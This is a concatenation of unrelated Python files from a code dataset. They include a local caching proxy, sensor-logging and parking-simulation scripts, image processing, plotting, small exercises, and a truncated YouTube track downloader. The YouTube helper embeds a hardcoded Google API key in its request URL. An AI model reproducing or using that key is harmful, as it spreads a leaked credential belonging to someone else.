(1)/2022_Winter/Dissertation_v13/South_America/Venezuela/data/historical/Observed_Data_WL/{}.csv'.format(id))","sub_path":"Venezuela/get_historical_observed_WL.py","file_name":"get_historical_observed_WL.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"578780896","text":"from argparse import ArgumentParser\nimport sys\nfrom math import ceil\nfrom methplotlib.version import __version__\nfrom datetime import datetime as dt\nfrom time import time\nimport logging\n\n\nclass Region(object):\n def __init__(self, region):\n self.chromosome, interval = region.replace(',', '').split(':')\n self.begin, self.end = [int(i) for i in interval.split('-')]\n self.size = self.end - self.begin\n self.string = \"{}_{}_{}\".format(self.chromosome, self.begin, self.end)\n\n\ndef make_windows(full_window, max_size=1e6):\n full_reg = Region(full_window)\n if full_reg.size > max_size:\n chunks = ceil(full_reg.size / max_size)\n chunksize = ceil(full_reg.size / chunks)\n return [\n Region(\"{}:{}-{}\".format(\n full_reg.chromosome,\n full_reg.begin + i * chunksize,\n full_reg.begin + (i + 1) * chunksize))\n for i in range(chunks)]\n else:\n return [full_reg]\n\n\ndef get_args():\n parser = ArgumentParser(description=\"plotting nanopolish methylation calls or frequency\")\n parser.add_argument(\"-v\", \"--version\",\n help=\"Print version and exit.\",\n action=\"version\",\n version='methplotlib {}'.format(__version__))\n parser.add_argument(\"-m\", \"--methylation\",\n nargs='+',\n help=\"nanopolish methylation calls or frequency output\",\n required=True if \"--example\" not in sys.argv else False)\n parser.add_argument(\"-n\", \"--names\",\n nargs='+',\n help=\"names of datasets in --methylation\",\n required=True if \"--example\" not in sys.argv else False)\n parser.add_argument(\"-w\", \"--window\",\n help=\"window (region) to which the visualisation has to be restricted\",\n required=True if \"--example\" not in sys.argv else False)\n parser.add_argument(\"-g\", \"--gtf\",\n help=\"add annotation based on a gtf file matching to your reference genome\")\n parser.add_argument(\"-b\", \"--bed\",\n help=\"add annotation based on a bed file matching to your reference genome\")\n parser.add_argument(\"--simplify\",\n help=\"simplify annotation track to show genes rather than transcripts\",\n action=\"store_true\")\n parser.add_argument(\"--split\",\n help=\"split, rather than overlay the methylation tracks\",\n action=\"store_true\")\n parser.add_argument(\"--smooth\",\n help=\"When plotting frequencies points are averaged using a rolling window\",\n type=int,\n default=5)\n parser.add_argument(\"--example\",\n action=\"store_true\",\n help=\"Show example command and exit.\")\n args = parser.parse_args()\n if not args.example and not len(args.names) == len(args.methylation):\n sys.exit(\"INPUT ERROR: Expecting the same number of names as datasets!\")\n return args\n\n\ndef init_logs(args):\n \"\"\"Initiate log file and log arguments.\"\"\"\n start_time = dt.fromtimestamp(time()).strftime('%Y%m%d_%H%M')\n logname = \"methplotlib_\" + start_time + \".log\"\n handlers = [logging.FileHandler(logname)]\n logging.basicConfig(\n format='%(asctime)s %(message)s',\n handlers=handlers,\n level=logging.INFO)\n logging.info('methplotlib {} started.\\nPython version is: {}\\nArguments are: {}'.format(\n __version__, sys.version.replace('\\n', ' '), args))\n","sub_path":"methplotlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"11284297","text":"import socket\nimport os\nimport time \n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n \nhost = \"\"\nportr = 20000\nports = 12345\n\n#server binds to port 12345\ns.bind((host, ports))\ns.listen(5)\n\nprint('Server listening....')\n\nwhile True:\n\n #setting up client\n r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n r.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\n #client connects to main server\n try:\n r.connect((host, portr))\n except Exception as e:\n print('Server error')\n time.sleep(6)\n\n #server accepting connection from browser\n conn, addr = s.accept()\n\n #the caching array\n cache = []\n try:\n with open(\"cache\", \"r\") as cache_var:\n cache = [w.strip() for w in cache_var.readlines()]\n except:\n print(\"Cache doesn't exist\")\n print('\\n\\ncache = ', end =\" \")\n print(cache)\n \n #receiving request from browser\n data = conn.recv(1024)\n data = data.decode('utf-8')\n\n #filtering all other requests\n if \"http://localhost:\" not in data:\n continue\n\n #getting the file name\n temp = data.split( )[1]\n filename = temp.split(\"/\")[3]\n\n if filename in cache:\n print(filename + \" in cache\")\n\n #generate request with If-Modified-Since header\n if_header = 'If-Modified-Since: ' + time.strftime(\"%a %b %d %H:%M:%S %Y\", time.strptime(time.ctime(os.path.getmtime(filename)), \"%a %b %d %H:%M:%S %Y\")) + '\\r\\n\\r\\n'\n if_request = data[:-2] + if_header\n if_request = if_request.replace(\"http://localhost:\" + str(portr), \"\")\n\n #sending request to main server\n r.send(bytearray(if_request, 'utf-8'))\n\n #recieving if response from main server\n if_response = b''\n while True:\n packet = r.recv(1024)\n if not packet:\n break\n if_response += packet\n temporary = if_response[:228].decode('utf-8')\n response_code = temporary.split(\" \")[1]\n\n #Not modified\n if response_code == \"304\":\n print(\"Not Modified\")\n #open file in cache\n try:\n with open(filename, \"rb\") as f:\n cache_response = f.read()\n except Exception as e:\n print(\"Error opening the file from cache\")\n print(e)\n cache.remove(filename)\n\n #send response to browser\n conn.send(cache_response)\n\n #Modified\n elif response_code == \"200\":\n print(\"Modified\")\n #update file in cache\n try:\n with open(filename, \"wb\") as f:\n f.write(if_response)\n except Exception as e:\n print(\"Error opening the file from cache\")\n print(e)\n cache.remove(filename)\n\n #send response to browser\n conn.send(if_response)\n\n else:\n print(filename + \" not in cache\")\n\n #forwarding request to main server\n request = data.replace(\"http://localhost:\" + str(portr), \"\")\n r.send(bytearray(request, 'utf-8'))\n\n #recieving response from main server\n response = b''\n while True:\n packet = r.recv(1024)\n if not packet:\n break\n response += packet\n\n #storing new file into cache\n if filename != '':\n #cache length is maxinmum of 3\n if len(cache) < 3:\n cache.append(filename)\n else:\n cache.append(filename)\n temp_file = cache[0]\n cache.remove(temp_file)\n\n #remove the old file from the directory\n try:\n os.remove(temp_file)\n except Exception as e:\n print(e)\n print(\"ERROR: \" + temp_file + \" does not exist\")\n\n #create new file for new entry in cache\n with open(filename, \"wb\") as new_file:\n new_file.write(response)\n\n #send response to browser\n conn.send(response)\n\n #update cache file with new entries\n with open(\"cache\", \"w\") as cache_var:\n cache_list = \"\\n\".join(cache)\n cache_var.write(cache_list)\n\n #close the server connection and client connection\n conn.close()\n r.close()\n","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"230236526","text":"\"\"\"\nGiven a string, your task is to reverse the vowels of string.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. Each test case contains a string.\n\nOutput:\nPrint the string with the vowels reversed.\n\nConstraints:\n1<=T<=10^5\n1<=length of the string<=10^5\n\nExample:\nInput:\n2\nhello world\ngeeks for geeks\n\nOutput:\nhollo werld\ngeeks for geeks\n\"\"\"\nt=int(input())\nfor i in range(t):\n s=list(input())\n v=['a','e','i','o','u']\n l=[]\n for i in s:\n if i in v:\n l.append(i)\n l=l[::-1]\n val=0\n for i in range(len(s)):\n if(s[i] in v):\n s[i]=l[val]\n val+=1\n for i in s:\n print(i,end=\"\")\n print()\n","sub_path":"reverse vowels.py","file_name":"reverse vowels.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78770510","text":"filename = input(\"Enter a file name: \")\nhandle = None\n\nif filename == \"na na boo boo\":\n print(\"NA NA BOO BOO TO YOU - You have been punk'd!\")\nelse:\n try:\n handle = open(f\"files/{filename }\", 'r')\n except FileNotFoundError:\n print(\"Failed to open file.\")\n quit()\n\n prefix = \"X-DSPAM-Confidence:\"\n numbers = []\n\n for line in handle:\n if line.startswith(prefix):\n numbers.append(\n float(line[len(prefix):].strip())\n )\n\n average = sum(numbers) / len(numbers)\n print(\"Average spam confidence:\", average)","sub_path":"chapter-8/exercise-3.py","file_name":"exercise-3.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"407654368","text":"import numpy as np\nimport cv2\nimport random\nimport sys\n\nif len(sys.argv) != 3:\n\tprint(\"usage : python3 src dst\\n\")\n\ttermination\n\t\nfor i in range(10):\n\torig_path = sys.argv[1] + str(i) + \".jpg\"\n\torig = cv2.imread(orig_path)\n\tprint(\"image : [%s] is loaded...\\n\" % orig_path)\n\t\n\tdummy, invs = cv2.threshold(cv2.resize(cv2.cvtColor(orig, cv2.COLOR_BGR2GRAY),(28,28)),\t\n\t\t\t\t\t\t\t0xFF>>1, 0xFF, cv2.THRESH_BINARY_INV)\n\n\theight, width = invs.shape\n\tcv2.imshow(\"original\", invs)\n\tcv2.moveWindow(\"original\", 0, 0)\n\n\tfor j in range(1000):\n\t\ttgt = invs\n\t\t#blur distortion\n\t\tmode = random.randrange(0,3)\n\t\tif mode == 0:\t\t\n\t\t\tksize = (random.randrange(1,3) * 2 + 1, random.randrange(1,3) * 2 + 1)\n\t\t\ttgt = cv2.blur(tgt, ksize)\n\t\telif mode == 1:\n\t\t\tksize = (random.randrange(1,3) * 2 + 1, random.randrange(1,3) * 2 + 1)\n\t\t\ttgt = cv2.GaussianBlur(tgt, ksize, 0)\n\t\telse:\n\t\t\tmsize = random.randrange(1, 3) * 2 + 1\n\t\t\ttgt = cv2.medianBlur(tgt, msize)\n\n\t\t#rotate distortion\n\t\tangle = random.uniform(-5.0, 5.0) \n\t\tMatrix = cv2.getRotationMatrix2D((width>>1, height>>1), angle, 1)\n\t\ttgt = cv2.warpAffine(tgt, Matrix, (width, height))\n\n\t\t#shift distortion\t\n\t\tif random.randrange(0, 2) == 0:\n\t\t\tdirection = 1\n\t\telse:\n\t\t\tdirection = -1\n\t\tdx = random.randrange(0, width >> 3)\n\t\tdy = random.randrange(0, height >> 3)\n\t\tMatrix = np.float32([[1, 0, direction * dx], [0, 1, direction * dy]])\n\t\ttgt = cv2.warpAffine(tgt, Matrix, (width, height))\n\t\n\t\t#scale distortion\n\t\tfactor_w = random.uniform(0.25, 1.0)\n\t\tfactor_h = random.uniform(0.25, 1.0)\n\t\ttgt = cv2.resize(cv2.resize(tgt, None, fx=factor_w, fy=factor_h), (width, height))\t\t\n\n\t\t#save distortion image\n\t\t#dummy, tgt = cv2.threshold(tgt, 0xFF>>1, 0xFF, cv2.THRESH_BINARY)\t\n\t\tcv2.imshow(\"tgt\", tgt)\n\t\tcv2.moveWindow(\"tgt\",0,300)\n\t\tcv2.waitKey(5)\n\t\tcv2.imwrite(sys.argv[2] + str(i) + \"/\" + str(j) + \".bmp\", tgt)\n","sub_path":"NeuralNetwork/DB/dbmaker.py","file_name":"dbmaker.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"514903012","text":"import matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nfrom os.path import join\nimport numpy as np\nimport matplotlib as mpl\nimport logging\n\nscr_dir = os.path.dirname(os.path.realpath(__file__))\n\n# set logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n# fh = logging.FileHandler(join(scr_dir, '...\\\\logs\\\\plot_tsa_subframes.log'))\n# fh.setFormatter(formatter)\n# logger.addHandler(fh)\n\nfile = 'S1-TSA_1Y_geom_water_X_v01.csv'\n\nhome_dir = join(scr_dir, '..\\\\auxdata', 'tsa')\nos.chdir(home_dir)\n\n\ndef read_and_format(file):\n df = pd.read_csv(file, header=0, )\n df = df.rename(columns={df.columns[0]: \"Datetime\"})\n df = df.rename(columns={'relativeOrbitNumber_start': 'RON'})\n df['Datetime'] = df['Datetime'].apply(lambda x: x[17:32])\n df['Datetime'] = pd.to_datetime(df['Datetime'], format='%Y%m%dT%H:%M:%S')\n df = df.set_index('Datetime')\n df = df.drop('.geo', 1)\n return df\n\n\ndf = read_and_format(file)\ncols = ['VV_p50', 'angle', 'RON', 'platform_number']\ndf = df[cols]\ndf = df[df['RON'].isin([15, 37, 139])]\ndf['RON'] = df['RON'].astype(int).astype(str)\ndf = df[df['platform_number'] == 'A']\n\ndfg = df.groupby(['RON']) # , 'platform_number'])\n\n\ndfg['VV_p50'].plot(\n linestyle='--',\n linewidth=2.0,\n figsize=(17, 8))\nplt.title('Sentinel-1A time series 10/2014-09/2018 - relative orbits')\nplt.legend(['S1A Orbit 133', 'S1A Orbit 15', 'S1A Orbit 37'],\n loc=1, prop={'size': 10})\nplt.xlabel('Date')\nplt.ylabel(r'Backscatter $\\sigma^0$')\n# dfg.boxplot(by='RON')\n\n\ntab = df.groupby('RON').agg({'VV_p50': ['min', 'max', 'mean'],\n 'angle': ['mean', 'std']})\nprint(tab)\nplt.show()\n","sub_path":"application/archiv/plot_tsa_subframes.py","file_name":"plot_tsa_subframes.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"108446451","text":"# -*- coding: cp1257 -*-\n\nimport Adafruit_DHT as tempsensor\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\nimport mh_z19\n\nimport time\nfrom datetime import datetime as clock\nfrom datetime import timedelta\n\nimport os\nimport sys\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nimport subprocess\n\n\nDHT_SENSOR = tempsensor.DHT22\nDHT_PIN = 4\nSAMPLE_TIME = 60\n\n\n\ntry:\n os.remove('testlog.csv')\n\nexcept:\n pass\n\ntry:\n \n file = open('/home/pi/Study_Fresh/Alpha/testlog.csv', 'a+')\n \n if os.stat('/home/pi/Study_Fresh/Alpha/testlog.csv').st_size == 0:\n \n file.write('Timestamp (MM/DD/YYYY HH:MM),Temperature (°C),Humidity (%),Co2 (ppm)\\r\\n')\n \nexcept:\n pass\n\nRST = 24\n# 128x32 display with hardware I2C:\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst = RST)\n\n\n# Initialize library.\ndisp.begin()\n\n# Clear display.\ndisp.clear()\n\n# Create blank image for drawing.\n# Make sure to create image with mode '1' for 1-bitt color.\nwidth = disp.width\nheight = disp.height\nimage = Image.new('1', (width, height))\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\n\n# First define some constants to allow easy resizing of shapes.\npadding = 1\ntop = padding\nbottom = height-padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\n# Load default font.\nfont = ImageFont.truetype('Mario-Kart-DS.ttf',36)\n\ndraw.text((x, top + 1), \"study\", font=font, fill=255)\ndraw.text((x, top + 33), \" fresh\", font=font, fill=255)\n\ndisp.image(image)\ndisp.display()\ntime.sleep(1)\n\ndraw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\nfont = ImageFont.truetype('Mario-Kart-DS.ttf',40)\ndraw.text((x, top + 1), \"BY UQ\", font=font, fill=255)\n\nfont = ImageFont.truetype('VCR_OSD_MONO_1.001.ttf',16)\ndraw.text((x, top + 47), \" loading...\", font=font, fill=255)\n\n# Display image.\ndisp.image(image)\ndisp.display()\n\nfont = ImageFont.truetype('VCR_OSD_MONO_1.001.ttf',15)\n\ntry:\n \n # Get Sensor Data\n humidity, temperature = tempsensor.read_retry(DHT_SENSOR, DHT_PIN)\n Co2 = mh_z19.read_all()['co2'] \n \n # Draw a black filled box to clear the image.\n draw.rectangle((0,0,width,height), outline=0, fill=0)\n \n # Write text.\n if humidity is not None and temperature is not None: \n \n draw.text((x, top + 0), \"Co2 : \" + str(Co2).rjust(4,' ') + \" PPM\", \\\n font=font, fill=255)\n draw.text((x, top + 16), \"TEM : \" + \"{:.1f}\".format(temperature) + \" C\", \\\n font=font, fill=255)\n draw.text((x, top + 32), \"HUM : \" + \"{:.1f}\".format(humidity) + \" %\", \\\n font=font, fill=255)\n \n timestamp = clock.now()\n \n draw.text((x, top + 48), timestamp.strftime('%d/%m %H:%M:%S'), \\\n font=font, fill=255)\n \n file.write('{0},{1:0.1f},{2:0.1f}%,{3}\\r\\n'.format(timestamp.strftime('%x %X'),\\\n temperature, humidity, Co2))\n \n print('{0},{1:0.1f},{2:0.1f}%,{3}\\r\\n'.format(timestamp.strftime('%x %X'),\\\n temperature, humidity, Co2))\n \n else:\n \n draw.text((x, top + 0), \"Co2 : \" + \"ERROR\", font=font, fill=255)\n draw.text((x, top + 16), \"TEM : \" + \"ERROR\", font=font, fill=255)\n draw.text((x, top + 32), \"HUM : \" + \"ERROR\", font=font, fill=255)\n \n timestamp = clock.now()\n draw.text((x, top + 48), timestamp.strftime('%d/%m %H:%M:%S'), \\\n font=font, fill=255) \n\n # Display image.\n disp.image(image)\n disp.display()\n \n startTime = clock.now()\n \n while True:\n \n try:\n \n \n # Get Sensor Data\n humidity, temperature = tempsensor.read_retry(DHT_SENSOR, DHT_PIN)\n Co2 = mh_z19.read_all()['co2']\n \n Diff = (clock.now()-startTime).total_seconds()\n # print(\"Diff = {0}\\r\\n\".format(Diff))\n \n if Diff > (SAMPLE_TIME - 0.2 * SAMPLE_TIME):\n \n time.sleep(SAMPLE_TIME - Diff)\n \n startTime = clock.now()\n # Draw a black filled box to clear the image.\n draw.rectangle((0,0,width,height), outline=0, fill=0)\n \n # Write text.\n if humidity is not None and temperature is not None: \n \n draw.text((x, top + 0), \"Co2 : \" + str(Co2).rjust(4,' ') + \" PPM\", \\\n font=font, fill=255)\n draw.text((x, top + 16), \"TEM : \" + \"{:.1f}\".format(temperature) + \" C\", \\\n font=font, fill=255)\n draw.text((x, top + 32), \"HUM : \" + \"{:.1f}\".format(humidity) + \" %\", \\\n font=font, fill=255)\n \n timestamp = clock.now()\n \n draw.text((x, top + 48), timestamp.strftime('%d/%m %H:%M:%S'), \\\n font=font, fill=255)\n \n file.write('{0},{1:0.1f},{2:0.1f}%,{3}\\r\\n'.format(timestamp.strftime('%x %X'),\\\n temperature, humidity, Co2))\n \n print('{0},{1:0.1f},{2:0.1f}%,{3}\\r\\n'.format(timestamp.strftime('%x %X'),\\\n temperature, humidity, Co2))\n \n else:\n \n draw.text((x, top + 0), \"Co2 : \" + \"ERROR\", font=font, fill=255)\n draw.text((x, top + 16), \"TEM : \" + \"ERROR\", font=font, fill=255)\n draw.text((x, top + 32), \"HUM : \" + \"ERROR\", font=font, fill=255)\n \n timestamp = clock.now()\n draw.text((x, top + 48), timestamp.strftime('%d/%m %H:%M:%S'), \\\n font=font, fill=255) \n\n # Display image.\n disp.image(image)\n disp.display()\n time.sleep(.1)\n \n \n except Exception as exception:\n \n print(exception)\n sys.exit(0)\n \nexcept KeyboardInterrupt as ex:\n \n draw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\n font = ImageFont.truetype('Mario-Kart-DS.ttf',24)\n draw.text((x, top + 1), \" studying \", font=font, fill=255)\n draw.text((x, top + 22), \"just got \", font=font, fill=255)\n draw.text((x, top + 44), \"FRESHER !! \", font=font, fill=255)\n\n # Display image.\n disp.image(image)\n disp.display()\n time.sleep(2)\n \n draw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\n font = ImageFont.truetype('Mario-Kart-DS.ttf',34)\n draw.text((x, top + 1), \"STAY \", font=font, fill=255)\n draw.text((x, top + 33), \"FRESH ! \", font=font, fill=255)\n\n # Display image.\n disp.image(image)\n disp.display()\n time.sleep(2)\n \n disp.clear()\n disp.reset()\n disp.display()\n \n print(ex)\n \n sys.exit(0)\n\n ","sub_path":"Archive/Alpha/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300039323","text":"# -*- coding:utf-8 -*-\n\nimport pygame\nimport random\nimport os\nimport argparse\nimport settings as opt\nimport logging\nfrom panel import PanelSocketServer\n\ninfo = logging.info\ndebug = logging.debug\nerror = logging.error\nwarning = logging.warning\n\nprogname = os.path.basename(__file__)\ncollide = pygame.sprite.spritecollide\n\nGAME = None\n\ndef setup_logging(opt):\n \"\"\"Configure basic logging.\"\"\"\n\n log_level = opt.verbose and logging.DEBUG or logging.INFO\n logging.basicConfig(level=log_level,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%d-%m %H:%M:%S',\n filename=\"parking.log\",\n filemode='w')\n\n logger = logging.getLogger()\n logger.setLevel(log_level)\n\n console = logging.StreamHandler()\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n console.setFormatter(formatter)\n console.setLevel(logging.DEBUG)\n logger.addHandler(console)\n\ndef parse_args(args):\n \"\"\"Parse command line ARGS. Return 'mapping' (from argparse).\"\"\"\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n add = parser.add_argument\n add(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Makes program more chatty.\")\n add(\"--width\", type=int, default=opt.WIDTH,\n help=\"Screen width.\")\n add(\"--height\", type=int, default=opt.HEIGHT,\n help=\"Screen height.\")\n add(\"--fps\", type=int, default=60,\n help=\"Screen update frequency.\")\n add(\"--random-moves-interval\", type=float, default=0.5,\n help=\"Time between consecutive random moves.\")\n\n return parser.parse_args(args)\n\ndef do_options(args):\n opt.FPS = args.fps\n opt.WIDTH = args.width\n opt.HEIGHT = args.height\n opt.RANDOM_MOVES_INTERVAL = args.random_moves_interval\n\n#\nimport socket\nclass SocketServer():\n\n def __init__(self, game, host=\"\", port=8000):\n try:\n self.game = game\n port = random.randint(2000, 9000)\n with open(\"port.txt\", \"w\") as file:\n file.write(\"%d\\n\" % port)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((host, int(port)))\n self.sock.listen(5)\n print(\"SocketServer running on port %d\" % port)\n except socket.error:\n raise Exception(\"SocketServer: error creating socket\")\n\n def _get_sensors_state(self):\n d = {s.oid:s.active for s in self.game.sensors}\n return [(k,v) for k,v in sorted(d.items())]\n\n def run(self):\n while 1:\n channel, client = self.sock.accept()\n info(\"server got connection from %s\", str(client))\n ss = [v and \"X\" or \"_\"\n for _,v in self._get_sensors_state()]\n o = \" \".join(ss)\n channel.send(o.encode())\n channel.close()\n\n#\nclass SocketClient():\n\n def __init__(self, host=\"\", port=8000):\n self.host = host\n self.port = int(port)\n\n def get_data(self):\n try:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n raise Exception(\"SocketClient: error creating socket\")\n sys.exit(1)\n self.sock.connect((self.host, self.port))\n data = self.sock.recv(1024)\n self.sock.close()\n return data\n\ndef main(args):\n \"\"\"Main program.\"\"\"\n\n global GAME\n\n import threading\n import game\n import sys\n args = parse_args(args) # parse command line arguments\n setup_logging(args) # config logging\n do_options(args)\n\n try:\n pygame.init()\n GAME = g = game.Game()\n\n s = SocketServer(g)\n p = PanelSocketServer(g)\n pt = threading.Thread(target=p.run)\n pt.daemon = True\n\n pt.start()\n t = threading.Thread(target=s.run)\n t.daemon = True\n t.start()\n\n while g.running:\n g.start_new()\n g.run()\n debug(\"Quitting pygame...\")\n\n finally:\n pygame.quit()\n return 0\n\nif __name__ == \"__main__\":\n\n import sys\n args = sys.argv[1:]\n sys.exit(main(args))\n","sub_path":"parking_simulation.py","file_name":"parking_simulation.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"276770474","text":"from PIL import Image\nimport math\nimport numpy\nfrom numpy import asarray\n\nme = '[Sobel]'\ncount = 0\nclass Sobel:\n\n def __init__(self, filename, Threshold, Gx=[[-1,0,1],[-2,0,2],[-1,0,1]], Gy=[[-1,-2,-1], [0,0,0], [1,2,1]]):\n self.filename = filename\n self.threshold = Threshold\n self.Gx = Gx\n self.Gy = Gy\n self.img = Image.open(self.filename)\n self.processThis = asarray(self.img)\n self.Gx = asarray(self.Gx)\n self.Gy = asarray(self.Gy)\n self.rows, self.columns, self.depth =self.processThis.shape\n self.result = Image.new(self.img.mode, (self.rows, self.columns))\n self.result1 = self.result.load()\n self.mag = Image.new(self.img.mode, (self.rows, self.columns))\n self.magMap = self.mag.load()\n self.NormI = Image.new(self.img.mode, (self.rows, self.columns))\n self.sobel()\n\n def sobel(self):\n mag = []\n maxScalar = 0\n for i in range(self.rows-2):\n for j in range(self.columns-2):\n S1 = self.Gx.dot(self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),0] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),1] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),2])/8\n S2 = self.Gy.dot(self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),0] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),1] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),2])/8\n\n\n mag_scalar = numpy.linalg.norm((numpy.sum(S1)**2) + (numpy.sum(S2)**2))\n\n self.magMap[i, j] = (int(mag_scalar),0,0)\n\n if mag_scalar > maxScalar:\n maxScalar = mag_scalar\n\n if self.magMap[i,j][0] >= self.threshold:\n self.result1[i,j] = (0, 0, 0)\n else:\n self.result1[i,j] = (255,255,255)\n\n print(\"Max Gradient: \" + str(maxScalar))\n maxGradient = maxScalar\n NormalizedGradient = self.NormI.load()\n\n for i in range(self.rows):\n for j in range(self.columns):\n NormalizedGradient[i,j] = (int((self.magMap[i,j][0] / 1028)*255), 0,0)\n print(NormalizedGradient[i,j][0])\n if NormalizedGradient[i,j][0]:\n NormalizedGradient[i,j] = (0,0,0)\n else:\n NormalizedGradient[i,j] = (255,255,255)\n global count\n count += 1\n self.NormI.save('Normalized_Gradient_' + str(count) +self.filename)\n print(me + 'INFO>Successfully Edge Detected with Sobel')\n\nif __name__ == '__main__':\n obj = Sobel(\"logo.png\", 200)\n obj.result.save('sobel_' + obj.filename)\n #laplacian\n lap = Sobel(\"logo.png\", 200,[[0,-1,0],[-1,4,-1], [0,-1,0]],[[-1,-1,-1],[-1,8,-1],[-1,-1,-1]])\n obj.result.save('laplacian_' + obj.filename)\n","sub_path":"python/sobelOperator/sobel.py","file_name":"sobel.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"360295513","text":"# coding=utf-8\n\"\"\"Reverse Pairs.\n\n>>> solve = _solve\n>>> solve([1, 3, 2, 3, 1])\n2\n>>> solve([2, 4, 3, 5, 1])\n3\n\"\"\"\n\n# 此题的其他解法包括\n# - BST:手动维护一颗二叉搜索树,虽然不做优化最坏情况复杂度为 O(n^2),但是此题可过\n# - BIT:树状数组,利用其 O(log(n)) 时间复杂度内修改单个元素并且维护区间信息的性质可作\n# 具体可参考此题的 solution\n\n\ndef _solve(nums):\n def _merge(low, mid, high):\n l_i, r_i = low, mid + 1\n total = 0\n while l_i <= mid and r_i <= high:\n if nums[l_i] > 2 * nums[r_i]:\n total += mid + 1 - l_i\n r_i += 1\n else:\n l_i += 1\n\n aux[low:high + 1] = nums[low:high + 1]\n l_i, r_i = low, mid + 1\n for i in xrange(low, high + 1):\n if l_i > mid:\n nums[i] = aux[r_i]\n r_i += 1\n elif r_i > high:\n nums[i] = aux[l_i]\n l_i += 1\n elif aux[r_i] < aux[l_i]:\n nums[i] = aux[r_i]\n r_i += 1\n else:\n nums[i] = aux[l_i]\n l_i += 1\n return total\n\n def _sort(low, high):\n if low < high:\n mid = low + (high - low) / 2\n total = _sort(low, mid) + _sort(mid + 1, high)\n return total + _merge(low, mid, high)\n return 0\n\n aux = [0] * len(nums)\n return _sort(0, len(nums) - 1)\n","sub_path":"hard/493.py","file_name":"493.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"445886791","text":"from __future__ import unicode_literals\nimport requests\nimport globals\nfrom termcolor import colored\nfrom django.conf import settings\nfrom vibes.weekly_setup.youtube_downloader import YoutubeDownloader\nfrom weeklyvibes import slack_utils\nimport isodate\n\nclass YoutubeTracksGetter:\n\n @classmethod\n def get_songs(cls, artist, songs):\n successful_downloads = []\n\n slack_utils.send_debug_slack_message('Searching for songs on youtube...', 6)\n for song_name in songs:\n if len(successful_downloads) >= globals.MAX_SONGS_PER_ARTIST:\n break\n\n slack_utils.send_debug_slack_message('Searching for song: ' + song_name, 7)\n\n params = (artist.name + ' ' + song_name)\n request_url = \"https://www.googleapis.com/youtube/v3/search?part=snippet&q=%s&type=video&videoCategoryId=10&key=AIzaSyAAcI5ehq9HIGXpcpaRvFvrYgWk3aOUxJI\" % params\n r = requests.get(request_url)\n if r.status_code is 200:\n if len(r.json()['items']) > 0:\n video_id = r.json()['items'][0]['id']['videoId']\n yt_url = \"http://youtube.com/watch?v=%s\" % video_id\n slack_utils.send_debug_slack_message('Found song at: ' + yt_url, 8)\n\n if YoutubeTracksGetter.check_should_download(video_id):\n song = YoutubeDownloader.download_song(artist, song_name, yt_url, video_id)\n if song is not None:\n successful_downloads.append(song)\n\n else:\n # notify us\n slack_utils.send_error_slack_message('Youtube api returned status code: %d' % (r.status_code))\n\n return successful_downloads\n\n @classmethod\n def check_should_download(cls, video_id):\n request_url = 